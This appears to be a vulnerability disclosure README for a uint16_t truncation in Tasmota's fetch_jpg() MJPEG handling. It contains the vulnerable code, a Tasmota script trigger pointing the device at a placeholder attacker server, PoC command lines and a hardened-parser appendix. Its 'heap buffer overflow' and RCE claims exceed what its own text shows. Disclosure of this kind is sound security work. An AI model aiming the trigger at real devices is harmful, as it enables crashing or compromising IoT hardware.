sermikr0/CVE-2026-38427

# CVE-2026-38427: Integer Wraparound → Heap Buffer Overflow in Tasmota fetch_jpg()

**CVE:** CVE-2026-38427
**Severity:** Critical (CVSS 9.8)
**Product:** Arendst Tasmota
**Affected Version:** <= 15.3.0.3
**File:** `tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino`
**Function:** `fetch_jpg()` — case 2 (MJPEG frame fetch)
**Author:** Saidakbarxon Maxsudxonov
**Disclosure:** Responsible — reported to Tasmota before publication

## Summary

In `fetch_jpg()` case 2 the scripter parses the `Content-Length` header of an incoming MJPEG frame with `atoi()` and stores the result in a `uint16_t`. Any declared length above 65535 is therefore reduced modulo 65536 before the frame buffer is allocated and read, so the device allocates and consumes only the truncated number of bytes and the rest of the attacker-controlled frame is left in the stream.

## Vulnerable Code

```c
// tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
// Case 2: fetch next MJPEG frame
char inbuff[64];
stream.readBytesUntil('\n', inbuff, sizeof(inbuff));  // reads "Content-Length: 70000"
char *cp = strchr(inbuff, ':');
uint16_t size = 0;
if (cp) {
  size = atoi(cp + 1);  // atoi() returns int 70000
                        // IMPLICIT TRUNCATION: uint16_t = 70000 & 0xFFFF = 4464
}
uint8_t *buff = (uint8_t *)special_malloc(size);  // malloc(4464) — too small!
if (buff) {
  stream.readBytes(buff, size);  // reads only 4464 bytes
                                 // 65536 bytes remain in stream → corruption
}
```

Note that the allocation and the `readBytes()` call both use the same truncated `size`, so the read shown here stays inside the allocation. The damage comes from processing a frame of attacker-chosen length with the wrong length: the unread remainder of the frame stays in the stream for whatever parses it next, and a declared length that wraps to exactly 0 skips the read entirely (see the table below).

## Integer Wraparound Table

| Content-Length (header) | uint16_t value | Buffer allocated | Bytes unread |
|-------------------------|----------------|------------------|--------------|
| 65536                   | 0              | 0 (skipped)      | 65536        |
| 65537                   | 1              | 1 byte           | 65536        |
| 70000                   | 4464           | 4464 bytes       | 65536        |
| 131072                  | 0              | 0 (skipped)      | 131072       |

## Attack Scenario

An attacker who can make a Tasmota device connect to their HTTP server (via a malicious Tasmota script or MITM) can send MJPEG frames with `Content-Length` values exceeding 65535. The device will:

1. Allocate a small buffer (the wrapped value)
2. Read only a fraction of the frame data
3. Leave the remaining bytes in the stream, corrupting the HTTP/WiFi stream state
4. Crash or exhibit undefined behavior, leading to potential RCE

**Trigger via Tasmota script:**

```
>D
>B
fetchjp(ATTACKER_IP:PORT/stream,0,0,1)
>1
=fetchjp(2,0,0,1)
```

## Proof of Concept

The PoC runs a fake MJPEG HTTP server that sends frames with malicious `Content-Length` values:

```sh
python3 CVE-2026-38427_poc.py --port 8889 --cl 65537
python3 CVE-2026-38427_poc.py --port 8889 --cl 131072
```

See [CVE-2026-38427_poc.py](CVE-2026-38427_poc.py) for the full implementation.

## Impact

- **Confidentiality:** High (RCE possible on ESP32)
- **Integrity:** High
- **Availability:** High (guaranteed crash/reboot)
- **Attack Vector:** Network
- **Authentication:** None required (the device must be scripted to connect to the attacker's server)

## Timeline

- **2026-03-29:** Vulnerability discovered and reported to MITRE
- **2026-03-29:** CVE-2026-38427 assigned
- **2026-05-xx:** Patch released by Tasmota (v15.3.0.4+)

## References

- [Tasmota GitHub](https://github.com/arendst/Tasmota)
- [xdrv_10_scripter.ino](https://github.com/arendst/Tasmota/blob/development/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino)
- CVE-2026-38427
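## Appendix: Reproducing the Truncation on the Host

The `uint16_t` truncation from the Vulnerable Code section, reproduced on constructed `Content-Length` lines next to a hardened parser. This is an added example, not code from the Tasmota project or from this repository's PoC: the functions `parse_cl_vulnerable`, `parse_cl_safe` and `bytes_left_in_stream`, the sample header lines, and the 65535-byte frame cap passed to the safe parser are assumptions for illustration. It goes one step beyond the table above by also showing what `atoi()` does with a negative or non-numeric value.

```c
// Added example (not Tasmota code): the uint16_t truncation in fetch_jpg()
// case 2 reproduced on constructed header lines, beside a hardened parser.
// parse_cl_vulnerable, parse_cl_safe, bytes_left_in_stream and MAX_FRAME are
// illustration-only names, not identifiers from Tasmota.
#include <ctype.h>
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Largest MJPEG frame we are willing to buffer; 65535 is an arbitrary
// illustrative cap, a real fix would tie it to available heap.
#define MAX_FRAME 65535UL

// Mirrors the flawed logic: atoi() result stored in a uint16_t.
// A 64-byte line buffer stands in for inbuff[] from the original snippet.
uint16_t parse_cl_vulnerable(const char *line) {
    char inbuff[64];
    strncpy(inbuff, line, sizeof inbuff - 1);
    inbuff[sizeof inbuff - 1] = '\0';
    char *cp = strchr(inbuff, ':');
    uint16_t size = 0;
    if (cp) {
        size = atoi(cp + 1);  // int -> uint16_t: value taken modulo 65536,
                              // negative values wrap as well (-5 -> 65531)
    }
    return size;
}

// Hardened parser: decode into a wide unsigned type, accept only a clean
// decimal number followed by optional CR/LF/space, and enforce an upper
// bound. Returns the length, or -1 if the header must be rejected.
long parse_cl_safe(const char *line, unsigned long max_frame) {
    const char *cp = strchr(line, ':');
    if (!cp) return -1;
    cp++;
    while (*cp == ' ' || *cp == '\t') cp++;
    if (!isdigit((unsigned char)*cp)) return -1;   // rejects "-5", "" etc.
    errno = 0;
    char *end;
    unsigned long v = strtoul(cp, &end, 10);
    if (errno == ERANGE) return -1;                // overflowed unsigned long
    while (*end == '\r' || *end == '\n' || *end == ' ') end++;
    if (*end != '\0') return -1;                   // trailing junk ("12abc")
    if (v == 0 || v > max_frame || v > (unsigned long)LONG_MAX) return -1;
    return (long)v;
}

// How many bytes of a frame that is really `actual_frame` bytes long are
// still sitting in the stream after the device read only `read_len` bytes.
size_t bytes_left_in_stream(size_t actual_frame, size_t read_len) {
    return actual_frame > read_len ? actual_frame - read_len : 0;
}

int main(void) {
    // Constructed header lines as a malicious MJPEG server would send them.
    const char *lines[] = {
        "Content-Length: 4096",
        "Content-Length: 65536",
        "Content-Length: 65537",
        "Content-Length: 70000",
        "Content-Length: 131072",
        "Content-Length: -5",
        "Content-Length: 12abc",
    };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        unsigned long declared = strtoul(strchr(lines[i], ':') + 1, NULL, 10);
        uint16_t bad = parse_cl_vulnerable(lines[i]);
        long good = parse_cl_safe(lines[i], MAX_FRAME);
        printf("%-24s vulnerable reads %5u, leaves %6zu unread; safe -> %ld\n",
               lines[i], bad, bytes_left_in_stream(declared, bad), good);
    }
    return 0;
}
```

Running it prints one line per header: the truncated length the vulnerable code would read, the bytes that would remain in the stream, and the safe parser's verdict (-1 for every line that is out of range, negative, or not a clean number). The fix in the safe variant is deliberately narrow: parse with `strtoul()` into a wide type, refuse anything that is not purely numeric, and bound the result before it ever reaches the allocator.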